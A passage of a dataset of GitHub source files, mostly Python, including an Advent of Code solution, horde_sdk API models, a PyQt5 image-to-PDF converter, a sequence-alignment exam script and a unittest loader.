'deep')) # Do NOT modify this line\n\n\nif __name__ == '__main__':\n    parser = argparse.ArgumentParser()\n    parser.add_argument('model', choices=['linear', 'deep'])\n    args = parser.parse_args()\n\n    if args.model == 'linear':\n        print ('[I] Start training linear model')\n        train_linear(MainLinear())\n    elif args.model == 'deep':\n        print ('[I] Start training deep model')\n        train_deep(MainDeep())\n\n    print ('[I] Training finished')\n","repo_name":"SouLeo/CS342_NeuralNets","sub_path":"cs342_hw/homework_02/homework/train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":2342,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
{"seq_id":"1688313019","text":"#!/usr/bin/env pypy3\n\nimport re\nimport sys\n\nINPUT_RE = re.compile(r'(?P<d1>[xy])=(?P<v1>\\d+), (?P<d2>[xy])=(?P<v2s>\\d+)..(?P<v2e>\\d+)')\n\n\ndef load_clay(filename):\n    with open(filename) as input_file:\n        lines = input_file.read().strip().splitlines()\n    for line in lines:\n        match = INPUT_RE.match(line)\n        if match.group('d1') == 'x' and match.group('d2') == 'y':\n            x = int(match.group('v1'))\n            for y in range(int(match.group('v2s')), int(match.group('v2e')) + 1):\n                yield x, y\n        elif match.group('d1') == 'y' and match.group('d2') == 'x':\n            y = int(match.group('v1'))\n            for x in range(int(match.group('v2s')), int(match.group('v2e')) + 1):\n                yield x, y\n        else:\n            raise ValueError()\n\n\nTEST = set(load_clay('test.txt'))\nBLOCKS = set(load_clay('input.txt'))\n\n\ndef visualise(flowing_water, resting_water, clay, stdout=False):\n    min_x = min(x for x, y in flowing_water | resting_water | clay)\n    min_y = min(y for x, y in flowing_water | resting_water | clay)\n    max_x = max(x for x, y in flowing_water | resting_water | clay)\n    max_y = max(y for x, y in flowing_water | resting_water | clay)\n    if stdout:\n        output = sys.stdout\n        output.write('\\n\\n~~~~~~~~~~~~~~~\\n\\n')\n    else:\n        output = open('debug.txt', 'w')\n    for y in range(min_y, max_y + 1):\n        for x in range(min_x, max_x + 1):\n            if (x, y) in clay:\n                output.write('█')\n            elif (x, y) in resting_water:\n                output.write('W')\n            elif (x, y) in 
flowing_water:\n                output.write('~')\n            else:\n                output.write(' ')\n        output.write('\\n')\n    if not stdout:\n        output.close()\n\n\ndef is_contained(x, y, min_x, max_x, clay, water):\n    # range() takes the step positionally, not as a keyword argument\n    for left_x in range(x, min_x - 1, -1):\n        if (left_x, y + 1) not in clay and (left_x, y + 1) not in water:\n            return False\n        if (left_x, y) in clay:\n            for right_x in range(x, max_x + 1):\n                if (right_x, y + 1) not in clay and (right_x, y + 1) not in water:\n                    return False\n                if (right_x, y) in clay:\n                    return True\n\n\ndef simulate(clay):\n    flowing_water = {(500, 0)}\n    resting_water = set()\n    min_x = min(x for x, y in clay)\n    max_x = max(x for x, y in clay)\n    min_y = min(y for x, y in clay)\n    max_y = max(y for x, y in clay)\n    last_size = (0, 0)\n    while last_size != (len(flowing_water), len(resting_water)):\n        last_size = (len(flowing_water), len(resting_water))\n        for x, y in sorted(flowing_water, key=lambda pos: pos[1]):\n            if (x, y + 1) not in clay and (x, y + 1) not in resting_water:\n                if y <= max_y:\n                    flowing_water.add((x, y + 1))\n            else:\n                if is_contained(x, y, min_x, max_x, clay, resting_water):\n                    flowing_water.remove((x, y))\n                    resting_water.add((x, y))\n                if (x - 1, y) not in clay and (x - 1, y) not in resting_water:\n                    flowing_water.add((x - 1, y))\n                if (x + 1, y) not in clay and (x + 1, y) not in resting_water:\n                    flowing_water.add((x + 1, y))\n    return len(list(filter(lambda pos: min_y <= pos[1] <= max_y, flowing_water | resting_water))), len(resting_water)\n\n\n# assert(simulate(TEST) == (57, 29))\npart_one, part_two = simulate(BLOCKS)\nprint(\"Part One: {}\".format(part_one))\nprint(\"Part Two: {}\".format(part_two))\n","repo_name":"cnorthwood/adventofcode","sub_path":"2018/17/challenge.py","file_name":"challenge.py","file_ext":"py","file_size_in_byte":3546,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"7"}
{"seq_id":"23155110346","text":"from loguru import logger\nfrom pydantic import Field\nfrom typing_extensions import override\n\nfrom horde_sdk.ai_horde_api.apimodels.alchemy._submit import AlchemyJobSubmitRequest\nfrom horde_sdk.ai_horde_api.apimodels.base import (\n    BaseAIHordeRequest,\n    JobRequestMixin,\n)\nfrom horde_sdk.ai_horde_api.consts import KNOWN_ALCHEMY_TYPES\nfrom horde_sdk.ai_horde_api.endpoints import AI_HORDE_API_ENDPOINT_SUBPATH\nfrom horde_sdk.consts import HTTPMethod\nfrom horde_sdk.generic_api.apimodels import (\n    APIKeyAllowedInRequestMixin,\n    HordeAPIObject,\n    HordeResponseBaseModel,\n    ResponseRequiringFollowUpMixin,\n)\n\n\n# FIXME\nclass AlchemyFormPayloadStable(HordeAPIObject):\n    \"\"\"Currently unsupported.\n\n    v2 API Model: `ModelInterrogationFormPayloadStable`\n    \"\"\"\n\n    @override\n    @classmethod\n    def get_api_model_name(cls) -> str | None:\n        return \"ModelInterrogationFormPayloadStable\"\n\n    additionalProp1: str = Field(validation_alias=\"additionalProp1\", description=\"Currently unsupported\")\n    additionalProp2: str = Field(validation_alias=\"additionalProp2\", description=\"Currently unsupported\")\n    additionalProp3: str = Field(validation_alias=\"additionalProp3\", description=\"Currently unsupported\")\n\n\nclass AlchemyPopFormPayload(HordeAPIObject, JobRequestMixin):\n    \"\"\"v2 API Model: `InterrogationPopFormPayload`.\"\"\"\n\n    @override\n    @classmethod\n    def get_api_model_name(cls) -> str | None:\n        return \"InterrogationPopFormPayload\"\n\n    form: KNOWN_ALCHEMY_TYPES = Field(\n        None,\n        description=\"The name of this interrogation form\",\n        examples=[\"caption\"],\n    )\n    payload: AlchemyFormPayloadStable | None = None\n    
r2_upload: str | None = Field(None, description=\"The URL in which the post-processed image can be uploaded.\")\n source_image: str | None = Field(None, description=\"The URL From which the source image can be downloaded.\")\n\n\nclass NoValidAlchemyFound(HordeAPIObject):\n \"\"\"v2 API Model: `NoValidInterrogationsFoundStable`.\"\"\"\n\n @override\n @classmethod\n def get_api_model_name(cls) -> str | None:\n return \"NoValidInterrogationsFoundStable\"\n\n bridge_version: int | None = Field(\n None,\n description=(\n \"How many waiting requests were skipped because they require a higher version of the bridge than this\"\n \" worker is running (upgrade if you see this in your skipped list).\"\n ),\n examples=[0],\n ge=0,\n )\n untrusted: int | None = Field(\n None,\n description=(\n \"How many waiting requests were skipped because they demanded a trusted worker which this worker is not.\"\n ),\n ge=0,\n )\n worker_id: int | None = Field(\n None,\n description=\"How many waiting requests were skipped because they demanded a specific worker.\",\n ge=0,\n )\n\n\nclass AlchemyPopResponse(HordeResponseBaseModel, ResponseRequiringFollowUpMixin):\n \"\"\"v2 API Model: `InterrogationPopPayload`.\"\"\"\n\n # and not actually specifying a schema\n forms: list[AlchemyPopFormPayload] | None = None\n skipped: NoValidAlchemyFound | None = None\n\n @override\n @classmethod\n def get_api_model_name(cls) -> str | None:\n return \"InterrogationPopPayload\"\n\n @override\n @classmethod\n def get_follow_up_default_request_type(cls) -> type[AlchemyJobSubmitRequest]:\n return AlchemyJobSubmitRequest\n\n @override\n @classmethod\n def get_follow_up_failure_cleanup_request_type(cls) -> type[AlchemyJobSubmitRequest]:\n return AlchemyJobSubmitRequest\n\n @override\n def get_follow_up_returned_params(self) -> list[dict[str, object]]:\n if not self.forms:\n return []\n all_ids: list[dict[str, object]] = []\n for form in self.forms:\n if not isinstance(form, AlchemyPopFormPayload):\n logger.warning(f\"Skipping form {form} as it is not an AlchemyPopFormPayload\")\n continue\n if form.id_:\n all_ids.append({\"id\": form.id_})\n\n return all_ids\n\n @override\n @classmethod\n def get_follow_up_request_types(cls) -> list[type[AlchemyJobSubmitRequest]]: # type: ignore[override]\n \"\"\"Return a list of all the possible follow up request types for this response.\"\"\"\n return [AlchemyJobSubmitRequest]\n\n\nclass AlchemyPopRequest(BaseAIHordeRequest, APIKeyAllowedInRequestMixin):\n \"\"\"Represents the data needed to make a request to the `/v2/interrogate/pop` endpoint.\n\n v2 API Model: `InterrogationPopInput`\n \"\"\"\n\n name: str\n priority_usernames: list[str]\n forms: list[KNOWN_ALCHEMY_TYPES]\n\n @override\n @classmethod\n def get_api_model_name(cls) -> str | None:\n return \"InterrogationPopInput\"\n\n @override\n @classmethod\n def get_http_method(cls) -> HTTPMethod:\n return HTTPMethod.POST\n\n @override\n @classmethod\n def get_api_endpoint_subpath(cls) -> AI_HORDE_API_ENDPOINT_SUBPATH:\n return AI_HORDE_API_ENDPOINT_SUBPATH.v2_interrogate_pop\n\n @override\n @classmethod\n def get_default_success_response_type(cls) -> type[AlchemyPopResponse]:\n return AlchemyPopResponse\n","repo_name":"Haidra-Org/horde-sdk","sub_path":"horde_sdk/ai_horde_api/apimodels/alchemy/_pop.py","file_name":"_pop.py","file_ext":"py","file_size_in_byte":5160,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"7"} +{"seq_id":"72300860703","text":"from PyQt5 import QtCore, QtGui, QtWidgets\r\nimport 
sys\r\nimport os\r\nfrom PyQt5.QtGui import *\r\nfrom PyQt5.QtCore import *\r\nfrom PyQt5.QtWidgets import *\r\nimport glob\r\nfrom PIL import *\r\nfrom img2pdf import *\r\nfrom reportlab.lib.pagesizes import letter\r\nfrom reportlab.pdfgen import canvas\r\n\r\n\r\nclass Ui_MainWindow(QWidget):\r\n def setupUi(self, MainWindow):\r\n self.dir_label = QtWidgets.QLabel(MainWindow)\r\n self.dir_label.setGeometry(QtCore.QRect(10, 10, 100, 20))\r\n self.dir_label.setText(\"Выбрана директория: \")\r\n MainWindow.setObjectName(\"MainWindow\")\r\n MainWindow.resize(500, 350)\r\n MainWindow.setStyleSheet(\r\n \"background-color: rgb(170, 255, 255);\\n\"\r\n \"background-color: rgb(237, 255, 203);\")\r\n self.centralwidget = QtWidgets.QWidget(MainWindow)\r\n self.centralwidget.setObjectName(\"centralwidget\")\r\n self.label = QtWidgets.QLabel(self.centralwidget)\r\n self.label.setGeometry(QtCore.QRect(0, 0, 500, 50))\r\n font = QtGui.QFont()\r\n font.setFamily(\"Seagull\")\r\n font.setPointSize(11)\r\n font.setBold(True)\r\n font.setItalic(False)\r\n font.setWeight(75)\r\n self.label.setFont(font)\r\n self.label.setStyleSheet(\r\n \"color: rgb(255, 255, 255);\\n\"\r\n \"background-color: rgb(188, 185, 255);\")\r\n self.label.setObjectName(\"label\")\r\n\r\n self.button_JPG = QtWidgets.QPushButton(self.centralwidget)\r\n self.button_JPG.setGeometry(QtCore.QRect(30, 70, 100, 25))\r\n self.button_JPG.setStyleSheet(\r\n \"background-color: rgb(255, 255, 255);\\n\"\r\n \"font: 8pt \\\"Seagull\\\";\")\r\n self.button_JPG.setObjectName(\"button_JPG\")\r\n\r\n self.button_PNG = QtWidgets.QPushButton(self.centralwidget)\r\n self.button_PNG.setGeometry(QtCore.QRect(30, 140, 100, 25))\r\n self.button_PNG.setStyleSheet(\r\n \"background-color: rgb(255, 255, 255);\\n\"\r\n \"font: 8pt \\\"Seagull\\\";\")\r\n self.button_PNG.setObjectName(\"button_PNG\")\r\n\r\n self.button_TIFF = QtWidgets.QPushButton(self.centralwidget)\r\n self.button_TIFF.setGeometry(QtCore.QRect(370, 70, 100, 25))\r\n self.button_TIFF.setStyleSheet(\r\n \"font: 8pt \\\"Seagull\\\";\\n\"\r\n \"background-color: rgb(255, 255, 255);\")\r\n self.button_TIFF.setObjectName(\"button_TIFF\")\r\n\r\n self.button_RAW = QtWidgets.QPushButton(self.centralwidget)\r\n self.button_RAW.setGeometry(QtCore.QRect(370, 140, 100, 25))\r\n self.button_RAW.setStyleSheet(\r\n \"font: 8pt \\\"Seagull\\\";\\n\"\r\n \"background-color: rgb(255, 255, 255);\")\r\n self.button_RAW.setObjectName(\"button_RAW\")\r\n\r\n self.button_BMP = QtWidgets.QPushButton(self.centralwidget)\r\n self.button_BMP.setGeometry(QtCore.QRect(195, 140, 100, 25))\r\n self.button_BMP.setStyleSheet(\r\n \"font: 8pt \\\"Seagull\\\";\\n\"\r\n \"background-color: rgb(255, 255, 255);\")\r\n self.button_BMP.setObjectName(\"button_BMP\")\r\n\r\n self.button_GIF = QtWidgets.QPushButton(self.centralwidget)\r\n self.button_GIF.setGeometry(QtCore.QRect(195, 70, 100, 25))\r\n self.button_GIF.setStyleSheet(\r\n \"background-color: rgb(255, 255, 255);\\n\"\r\n \"font: 8pt \\\"Seagull\\\";\")\r\n self.button_GIF.setObjectName(\"button_GIF\")\r\n\r\n self.button_convert = QtWidgets.QPushButton(self.centralwidget)\r\n self.button_convert.setGeometry(QtCore.QRect(50, 250, 150, 50))\r\n self.button_convert.setStyleSheet(\r\n \"font: 8pt \\\"Seagull\\\";\\n\"\r\n \"background-color: rgb(255, 255, 255);\")\r\n self.button_convert.setObjectName(\"button_convert\")\r\n\r\n self.button_convert_TIFF = QtWidgets.QPushButton(self.centralwidget)\r\n self.button_convert_TIFF.setGeometry(QtCore.QRect(300, 250, 150, 50))\r\n 
self.button_convert_TIFF.setStyleSheet(\r\n \"font: 8pt \\\"Seagull\\\";\\n\"\r\n \"background-color: rgb(255, 255, 255);\")\r\n self.button_convert_TIFF.setObjectName(\"button_convert_TIFF\")\r\n\r\n MainWindow.setCentralWidget(self.centralwidget)\r\n self.menubar = QtWidgets.QMenuBar(MainWindow)\r\n self.menubar.setGeometry(QtCore.QRect(0, 0, 500, 21))\r\n self.menubar.setObjectName(\"menubar\")\r\n MainWindow.setMenuBar(self.menubar)\r\n self.statusbar = QtWidgets.QStatusBar(MainWindow)\r\n self.statusbar.setObjectName(\"statusbar\")\r\n MainWindow.setStatusBar(self.statusbar)\r\n\r\n self.retranslateUi(MainWindow)\r\n QtCore.QMetaObject.connectSlotsByName(MainWindow)\r\n\r\n\r\n self.button_JPG.clicked.connect(self.choose_table_JPG)\r\n self.button_PNG.clicked.connect(self.choose_table_PNG)\r\n self.button_GIF.clicked.connect(self.choose_table_GIF)\r\n self.button_BMP.clicked.connect(self.choose_table_BMP)\r\n self.button_TIFF.clicked.connect(self.choose_table_TIFF)\r\n self.button_RAW.clicked.connect(self.choose_table_RAW)\r\n\r\n self.button_JPG.clicked.connect(self.onClick)\r\n self.button_PNG.clicked.connect(self.onClick)\r\n self.button_BMP.clicked.connect(self.onClick)\r\n self.button_GIF.clicked.connect(self.onClick)\r\n self.button_TIFF.clicked.connect(self.onClick)\r\n self.button_RAW.clicked.connect(self.onClick)\r\n\r\n self.button_convert.clicked.connect(self.converter)\r\n self.button_convert_TIFF.clicked.connect(self.convert_TIFF)\r\n\r\n\r\n def retranslateUi(self, MainWindow):\r\n self.setWindowIcon(QIcon('web/icon.png'))\r\n _translate = QtCore.QCoreApplication.translate\r\n MainWindow.setWindowTitle(_translate(\"MainWindow\", \"Конвертатер в PDF\"))\r\n self.label.setText(_translate(\"MainWindow\", \" Программа для конвертации различных файлов в формат PDF\"))\r\n self.button_JPG.setText(_translate(\"MainWindow\", \"Файл JPG\"))\r\n self.button_PNG.setText(_translate(\"MainWindow\", \"Файл PNG\"))\r\n self.button_TIFF.setText(_translate(\"MainWindow\", \"Файл TIFF\"))\r\n self.button_BMP.setText(_translate(\"MainWindow\", \"Файл BMP\"))\r\n self.button_GIF.setText(_translate(\"MainWindow\", \"Файл GIF\"))\r\n self.button_RAW.setText(_translate(\"MainWindow\", \"Файл RAW\"))\r\n self.button_convert.setText(_translate(\"MainWindow\", \"Конвертировать\"))\r\n self.button_convert_TIFF.setText(_translate(\"MainWindow\", \"Конвертировать TIFF в JPG\"))\r\n\r\n\r\n\r\n def choose_table_files(self, file_type):\r\n image_files, _ = QFileDialog.getOpenFileNames(self, 'Выберите файл', os.path.expanduser(\"~\"), f'Image files (*.{file_type})')\r\n if image_files:\r\n for image_file in image_files:\r\n pixmap = QPixmap(image_file)\r\n self.label.setPixmap(pixmap)\r\n self.file_type = file_type\r\n return image_files\r\n\r\n def choose_table_JPG(self):\r\n self.choose_table_files('jpg')\r\n return\r\n\r\n\r\n def choose_table_PNG(self):\r\n self.choose_table_files('png')\r\n return\r\n\r\n\r\n def choose_table_GIF(self):\r\n self.choose_table_files('gif')\r\n return\r\n\r\n\r\n def choose_table_BMP(self):\r\n self.choose_table_files('bmp')\r\n return\r\n\r\n\r\n def choose_table_TIFF(self):\r\n self.choose_table_files('tif')\r\n return\r\n\r\n\r\n def choose_table_RAW(self):\r\n self.choose_table_files('raw')\r\n return\r\n\r\n\r\n def onClick(self):\r\n directory = QFileDialog.getExistingDirectory(self, \"Выберите папку для сохранения\")\r\n if directory:\r\n self.thedir = str(directory)\r\n print('Выбрана директория: ' + self.thedir)\r\n self.dir_label.setText(self.thedir)\r\n 
else:\r\n            print('Директория не выбрана.')\r\n        return\r\n\r\n\r\n    def convert_TIFF(self):\r\n        # match both .tif and .tiff, since the file dialog selects *.tif\r\n        for files in glob.glob(os.path.join(self.thedir, '*.tif*')):\r\n            name_wo_ext = os.path.splitext(files)[0]\r\n            with Image.open(files) as im:\r\n                rgb_convert = im.convert('RGB')\r\n                rgb_convert.save(name_wo_ext + '.jpg')\r\n        print(\"Конвертация TIFF-изображений в JPG завершена\")\r\n        return\r\n    \r\n    def converter(self):\r\n        imgs = []\r\n        for r, _, f in os.walk(self.thedir):\r\n            for fname in f:\r\n                if not fname.endswith((\".jpg\", \".png\", \".bmp\", \".tiff\", \".tif\", \".gif\", \".raw\")):\r\n                    continue\r\n                imgs.append(os.path.join(r, fname))\r\n        pdf = canvas.Canvas(os.path.join(self.thedir, 'WORK.pdf'), pagesize=letter)\r\n        for img_path in imgs:\r\n            with Image.open(img_path) as img:\r\n                width, height = img.size\r\n                if width > height:\r\n                    pdf.setPageSize((height, width))\r\n                else:\r\n                    pdf.setPageSize((width, height))\r\n                pdf.drawImage(img_path, 0, 0, width, height)\r\n                pdf.showPage()\r\n        pdf.save()\r\n        print(\"Конвертация в PDF завершена\")\r\n\r\n\r\nif __name__ == \"__main__\":\r\n    import sys\r\n    app = QtWidgets.QApplication(sys.argv)\r\n    MainWindow = QtWidgets.QMainWindow()\r\n    ui = Ui_MainWindow()\r\n    ui.setupUi(MainWindow)\r\n    MainWindow.show()\r\n    sys.exit(app.exec_())\r\n","repo_name":"Vlados684/Converter","sub_path":"converter.py","file_name":"converter.py","file_ext":"py","file_size_in_byte":9486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"21159576886","text":"#!/usr/bin/env python3\n\"\"\"\nAuthor: Anna-Marie Seelen\nStudentnumber:1008970\nDescription: alignment of protein sequences to a reference protein sequence\nand returning stats\nUsage: python3\n\"\"\"\n# import statement\nfrom sys import argv\nimport re\nimport subprocess\nimport os.path\n\n# functions\ndef parse_input(fileref, filerelated):\n    \"\"\"Return protein sequences from two input files\n\n    fileref: str, name of input file with the reference protein sequence\n    in fasta format\n    filerelated: str, name of input file with the protein sequences to compare\n    to the reference protein sequence in fasta format\n    return: dict, with name of sequence as key and protein sequence as value\n    \"\"\"\n    lines=(open(fileref))\n    dict={}\n    for line in lines:\n        line=line.strip()\n        if line.startswith(\">\"):\n            line=line.replace(\">\", \"\")\n            occur = re.search(r'Guanine', line)\n            index=occur.start()\n            line=line[0:index-1]\n            dict[line]=\"\"\n        else:\n            key=list(dict)[-1]\n            dict[key]+=line\n    lines=(open(filerelated))\n    for line in lines:\n        line=line.strip()\n        if line.startswith(\">\"):\n            line=line.replace(\">\", \"\")\n            occur = re.search(r'Guanine', line)\n            index=occur.start()\n            line=line[0:index-1]\n            dict[line]=\"\"\n        else:\n            key=list(dict)[-1]\n            dict[key]+=line\n    return dict\n\ndef lenght_seq(dict):\n    \"\"\"Calculates the length of a protein seq\n\n    dict: dict, with name of sequence as key and protein sequence as value\n    return: dict, with name of sequence as key and sequence \n    length as value\n    \"\"\"\n    dict_with_lenght={}\n    for key in dict:\n        lenght_seq=len(dict[key])\n        dict_with_lenght[key]=lenght_seq\n    return dict_with_lenght\n    \ndef write_files(dict):\n    #for i in range(1,len(dict))\n    file_ref=open(\"ref.fasta\", \"w\")\n    file_ref.write(\">{}\\n\".format(list(dict.keys())[0]))\n    file_ref.write(dict[list(dict.keys())[0]])\n    \n    file_rel=open(\"rel.fasta\", \"w\")\n    file_rel.write(\">{}\\n\".format(list(dict.keys())[1]))\n    file_rel.write(dict[list(dict.keys())[1]])\n    \n    
file_ref.close()\n    file_rel.close()\n    return (file_ref, file_rel)\n    # these new files didn't work when I inputted them on the command line for\n    # the needle program, so I ended up using P6ref.fasta as the files.\n\ndef run_needle():\n    out_fn = \"out.needle\"\n    cmd = 'needle {} {}'\\\n    .format(\"P6ref.fasta\", \"P6ref.fasta\")\n    # I couldn't give all arguments because needle would give an error;\n    # 8.0, 0.5 and out.needle have to be typed into the command line.\n    res = subprocess.check_output(cmd, shell=True)\n    return res\n    \n    #out=needle(ref, rel, 8.0, 0.5, out.needle)\n    #print(out.needle)\n\ndef extract_alignments(out_fn):\n    lines=(open(out_fn))\n    clean_lines=[]\n    for line in lines:\n        line=line.strip()\n        if line.startswith(\"GPA1\"):\n            line=''.join(filter(lambda ch: not ch.isdigit(), line))\n            line = line.replace(\" \", \"\")\n            line = line.replace(\"GPA_ARATH\", \"\")\n            clean_lines.append(line)\n        else:\n            pass\n    #for an even line join them, for an odd line join them\n    ref_lines = []\n    pro_lines = []\n    for i,line in enumerate(clean_lines):\n        if i%2==0:\n            pro_lines.append(line)\n        else:\n            ref_lines.append(line)\n    string_ref=\"\"\n    string_rel=\"\"\n    for i in ref_lines:\n        string_ref+=i\n    for i in pro_lines:\n        string_rel+=i \n    list_of_string=[]\n    list_of_string.append(string_ref)\n    list_of_string.append(string_rel)\n    return list_of_string\n\ndef hamming_distance(list_of_string):\n    \"\"\"Return the number of corresponding characters that differ in two aligned sequences.\n\n    list_of_string: list of strings with two aligned sequences\n    return: int, count of differing corresponding characters\n    \"\"\"\n    count=0\n    for i in range(len(list_of_string[1])):\n        if list_of_string[0][i] != list_of_string[1][i]:\n            count+=1\n        else:\n            pass\n    return count\n\ndef to_output_tab_file(lenght_dict, h_distance):\n    \"\"\"Write a tab delimited file with one line per sequence\n\n    lenght_dict: dict, with name of sequence as key and sequence length as value\n    h_distance: int, hamming distance between the pairwise alignments\n    return: None, writes a tab delimited text file with name, length and\n    hamming distance on each line\n    \"\"\"\n    tab_file=open(\"P6_out_tab_delimited.txt\", \"w\")\n    for key in lenght_dict:\n        tab_file.write(\"{0}\\t{1}\\t{2}\".format(key, lenght_dict[key], h_distance))\n        tab_file.write(\"\\n\")\n    return None\n\ndef main():\n    \"\"\"Main function of this module\"\"\"\n    # step 1: parse the protein sequence from file 1 and file 2 into dict\n    dict=parse_input(argv[1], argv[2])\n    # step 2: determine the length of the sequences\n    lenght_dict=lenght_seq(dict)\n    # step 3: make the files for needle\n    file_ref, file_rel=write_files(dict)\n    # step 4: align protein sequences from file 1 to the other species in file 2\n    run_needle()\n    # step 5: parse needle output to extract pairwise alignments\n    list_of_string=extract_alignments(argv[3])\n    # step 6: calculate hamming distance between pairwise alignments\n    h_distance=hamming_distance(list_of_string)\n    # step 7: write a tab delimited file with the sequence lengths and hamming distance\n    to_output_tab_file(lenght_dict, h_distance)\n\nif __name__==\"__main__\":\n    main()\n","repo_name":"Anna-MarieSeelen/Advanced_Bioinformatics","sub_path":"P6_test_exam.py","file_name":"P6_test_exam.py","file_ext":"py","file_size_in_byte":5534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"7335150318","text":"# All rights reserved by forest fairy.\n# You cannot modify or share anything without sacrifice.\n# If you don't agree, keep calm and don't look at code below!\n\n__author__ = \"VirtualV \"\n__date__ = \"11/01/17 12:30\"\n\nimport re\nimport inspect\nfrom config import CONFIG\nfrom unittest import defaultTestLoader\nfrom libs.core.unittest.wait import Wait\nfrom libs.core.template import NAME, SUITE_FULL\nfrom libs.core.logger import getLogger, getSysLogger\nfrom libs.core.unittest.unitcore import run, setUp, tearDown, setUpClass, tearDownClass\n\n\nclass ScanTests:\n    \"\"\" Scan TestSuites to find unittests functions \"\"\"\n\n    def __init__(self, logger=None):\n        self.logger = logger or getLogger(__file__)\n        self.syslogger = getSysLogger()\n\n    async def load_tests(self, libs_options):\n        \"\"\"\n        Load all available Tests for selected TestSuites and update CONFIG.UNITTEST.SELECTED_TEST_CASES list.\n\n        All tests packaging to **suites['tests']** list for each TestCase\n\n        Tests loading via :func:`defaultTestLoader.loadTestsFromTestCase()`\n        Also all unittest function like setUp, tearDown, etc. replaced with analog from\n        :mod:`src.libs.core.unittest.unitcore` module.\n\n        Tests packaging to dict with following structure:\n\n        .. code-block:: python\n\n            {'id': 'TestId', # Function name returns by id() unittest function\n             'name': 'ShortDescription', # Test description before '|' symbol returns by shortDescription() unittest function or None\n             'desc': 'FullDescription', # Test description after '|' symbol returns by shortDescription() unittest function or None\n             'index': int, # Test index to identify duplicate Tests. Starting from 1\n             'results': [], # List of results dictionaries for each global cycles. 
Empty before Test run\n 'test': 'Function'} # Test function link to launch\n\n Function add TestCase filter.\n\n Filters:\n load_tests: When Tests were loaded\n\n Details of **results** structure may be found in :func:`unitcore.run` function.\n Test package stored in TestSuite list for each TestCase :func:`ScanCases.generate_cases_dict`.\n \"\"\"\n # wait for selected suites\n await Wait.wait_for_selected_suites()\n\n # get function name to add to filter tags\n filter_name = inspect.getframeinfo(inspect.currentframe()).function\n\n # scan all cases\n for case in CONFIG.UNITTEST.SELECTED_TEST_CASES:\n # scan all suites\n for suite in case['suites']:\n result = []\n cls = suite['class']\n # add libs options\n if not hasattr(cls, '__libs_options'):\n setattr(cls, '__libs_options', libs_options)\n\n # replace unittest functions in Test class\n if not hasattr(cls, '__originalSetUpClass'):\n setattr(cls, '__originalSetUpClass', cls.setUpClass)\n cls.setUpClass = lambda slf=cls: setUpClass(slf)\n if not hasattr(cls, '__originalTearDownClass'):\n setattr(cls, '__originalTearDownClass', cls.tearDownClass)\n cls.tearDownClass = lambda slf=cls: tearDownClass(slf)\n if not hasattr(cls, '__originalSetUp'):\n setattr(cls, '__originalSetUp', cls.setUp)\n cls.setUp = lambda slf=cls: setUp(slf)\n if not hasattr(cls, '__originalTearDown'):\n setattr(cls, '__originalTearDown', cls.tearDown)\n cls.tearDown = lambda slf=cls: tearDown(slf)\n if not hasattr(cls, '__originalRun'):\n setattr(cls, '__originalRun', cls.run)\n cls.run = lambda slf=cls, *args, **kwargs: run(slf, *args, **kwargs)\n\n # keep default values\n # self.syslogger.info('Checking default values of [%s] class for [%s.%s] TestSuite ...'\n # % (cls.__name__, case['name'], suite['name']))\n # await self.check_default_values(cls)\n # self.syslogger.done()\n\n # get tests from class\n self.syslogger.info('Loading Tests for %s TestSuite' % SUITE_FULL.safe_substitute(case=case['name'],\n suite=suite['name'],\n index=case['index']))\n test_list = defaultTestLoader.loadTestsFromTestCase(suite['class'])\n for test in test_list._tests:\n desc = test.shortDescription()\n tid = test.id().split('.')[-1]\n # add test to TestSuite\n result.append({'id': tid.lower(),\n 'name': desc.split('|')[0].strip('-').strip().lower() if desc is not None else None,\n 'desc': desc.split('|')[1].strip() if desc is not None and desc.find('|') > -1 else desc,\n 'index': -1,\n 'results': [],\n 'test': test})\n self.syslogger.info('Found %s/%s <%s> Test' % (NAME.safe_substitute(name=tid),\n NAME.safe_substitute(name=result[-1]['name']),\n result[-1]['desc']))\n # add tests sorted by digits in test ID\n suite['tests'] = sorted(result, key=lambda data: [int(x) if x.isdigit() else x\n for x in re.split('(\\d+)', data['id'])])\n # update test index after sort\n for i, test in enumerate(suite['tests']):\n test['index'] = i+1\n\n # add auto-variables\n # ScanTests.create_auto_variables(cls, result)\n self.syslogger.done()\n\n # add filter to case\n case['filters'].append(filter_name)\n\n # @staticmethod\n # def create_auto_variables(cls, tests):\n # \"\"\"\n # Create auto-variables like testXX_cycles/NAME_cycles\n #\n # Args:\n # cls (class): Class to add variables\n # tests (list): List of Test dists\n # \"\"\"\n # for test in tests:\n # # create XX_cycles variables\n # cycle_id = '%s_cycles' % test['id']\n # value = getattr(cls, cycle_id, 0)\n # if test['name'] is not None:\n # cycle_name = '%s_cycles' % Tools.convert_name_to_variable(test['name']).lower()\n # value = value or 
getattr(cls, cycle_name, 1)\n # setattr(cls, cycle_name, value)\n # setattr(cls, cycle_id, value or 1)\n\n\n # @staticmethod\n # async def check_default_values(cls):\n # \"\"\"\n # Check default variables in class and restore static values to default if found or keep current static\n # values to default variables if not.\n # \"\"\"\n # # get all variables\n # variables = ([x for x in cls.__dict__ if not x.startswith('_')\n # and not hasattr(cls.__dict__[x], '__call__')\n # and not hasattr(cls.__dict__[x], '__func__')])\n # # scan all variables\n # for var in variables:\n # default = '_%s__default__%s' % (cls.__name__, var)\n # # set to default value\n # if hasattr(cls, default):\n # print('HAVE: ', default)\n # setattr(cls, var, getattr(cls, default))\n # # store default values\n # else:\n # print('SET: ', default)\n # setattr(cls, default, getattr(cls, var))\n","repo_name":"VirtualVFix/AndroidTestFramework","sub_path":"src/libs/core/unittest/scan/scantests.py","file_name":"scantests.py","file_ext":"py","file_size_in_byte":8013,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"} +{"seq_id":"20432849089","text":"from 视觉模组 import *\n\n摄影机 = 设置影像撷取()\n\nwhile True:\n 阵列 = 撷取影像(摄影机)\n 阵列 = 左右翻转(阵列)\n 阵列 = 彩色转灰阶(阵列)\n \n 阵列[:, ::50] = 255\n 阵列[::50, :] = 255\n \n 